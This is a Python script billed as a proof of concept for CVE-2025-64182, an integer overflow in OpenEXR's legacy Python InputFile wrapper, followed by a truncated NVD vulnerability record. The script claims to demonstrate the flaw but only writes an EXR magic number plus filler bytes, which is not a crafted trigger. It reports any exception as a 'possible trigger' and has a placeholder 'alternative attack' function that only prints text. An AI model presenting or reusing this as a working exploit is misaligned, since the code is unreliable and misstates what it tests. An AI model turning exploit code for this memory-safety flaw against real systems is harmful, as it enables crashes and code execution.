CVE-2025-64182

#!/usr/bin/env python3 """ CVE-2025-64182 PoC - OpenEXR Python Binding Integer Overflow This PoC demonstrates the integer overflow vulnerability in OpenEXR's legacy Python adapter (InputFile.channel() and InputFile.channels()) Note: This is for educational/testing purposes only """ import struct import os def create_malicious_exr(filename): """ Create a malicious EXR file that triggers integer overflow in InputFile.channel() / InputFile.channels() """ # EXR header magic number header = b'\x76\x2f\x31\x01' # Create a malformed EXR with suspicious channel data # that could trigger integer overflow during channel processing with open(filename, 'wb') as f: f.write(header) # Add malicious channel information # The exact format depends on the vulnerability trigger f.write(b'A' * 1024) # Padding data print(f"[+] Created malicious EXR file: {filename}") return filename def trigger_vulnerability(exr_file): """ Attempt to trigger the vulnerability by opening the malicious EXR """ try: import OpenEXR import Imath # Try to open the malicious file exr = OpenEXR.InputFile(exr_file) # This should trigger the integer overflow in channel() # causing heap overflow or NULL dereference channels = exr.channels() print("[-] Vulnerability not triggered or patched") except ImportError: print("[-] OpenEXR Python module not installed") print("[+] Install with: pip install openexr") except Exception as e: print(f"[+] Exception caught (possible trigger): {type(e).__name__}") print(f"[+] Error: {str(e)}") def create_crafted_python_object(): """ Alternative attack vector: Pass crafted Python objects that trigger the vulnerability """ # This demonstrates the alternative attack vector mentioned # in the CVE description print("[+] Alternative attack: Crafted Python objects") print("[+] The vulnerability can also be triggered by passing") print("[+] crafted Python objects to InputFile methods") if __name__ == '__main__': print("=" * 60) print("CVE-2025-64182 PoC - OpenEXR Integer Overflow") print("=" * 60) # Create malicious EXR file malicious_file = "malicious.exr" create_malicious_exr(malicious_file) # Attempt to trigger vulnerability print("\n[*] Attempting to trigger vulnerability...") trigger_vulnerability(malicious_file) # Alternative attack vector create_crafted_python_object() # Cleanup if os.path.exists(malicious_file): os.remove(malicious_file) print("\n[*] PoC execution completed") print("\n[!] Note: Actual exploitation requires specific conditions") print("[!] See: https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-vh63-9mqx-wmjr")

{"cve": {"id": "CVE-2025-64182", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:37.120", "lastModified": "2025-12-08T15:37:24.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.2.0 through 3.2.4, 3.3.0 through 3.3.5, and 3.4.0 through 3.4.2, a memory safety bug in the legacy OpenEXR Python adapter (the deprecated OpenEXR.InputFile wrapper) allow crashes and likely code execution when opening attacker-controlled EXR files or when passing crafted Python objects. Integer overflow and unchecked allocation in InputFile.channel() and InputFile.channels() can lead to heap overflow (32 bit) or a NULL deref (64 bit). Versions 3.2.5, 3.3.6, and 3.4.3 contain a patch for the issue."}, {"lang": "es", "value": "OpenEXR proporciona la especificación y la implementación de referencia del formato de archivo EXR, un formato de almacenamiento de imágenes para la industria cinematográfica. En las versiones 3.2.0 a la 3.2.4, 3.3.0 a la 3.3.5 y 3.4.0 a la 3.4.2, un error de seguridad de memoria en el adaptador Python heredado de OpenEXR (el envoltorio obsoleto OpenEXR.InputFile) permite fallos y una probable ejecución de código al abrir archivos EXR controlados por el atacante o al pasar objetos Python manipulados. El desbordamiento de enteros y la asignación no verificada en InputFile.channel() e InputFile.channels() pueden conducir a un desbordamiento de montículo (32 bits) o a una desreferencia de NULL (64 bits). Las versiones 3.2.5, 3.3.6 y 3.4.3 contienen un parche para el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.0", "versionEndExcluding": "3.2.5", "matchCriteriaId": "B39DE559-AB72-4C61-9E6B-E9125859D199"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.3.0", "versionEndExcluding": "3.3.6", "matchCriteriaId": "A83D8F0B-0D0A-403E-8D2E-2FB455041B8A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openexr:openexr:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.3", "matchCriteriaId": "78287128-E16E-431F-922F-1F0272327A0D"}]}]}], "references": [{"url": "https://github.com/AcademySoftwareFoundation/openexr/blob/b3a19903db0672c63055023aa788e592b16ec3c5/src/wrappers/python/PyOpenEXR_old.cpp#L528-L536", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-vh63-9mqx-wmjr", "source": "[email protected]", " ... (truncated)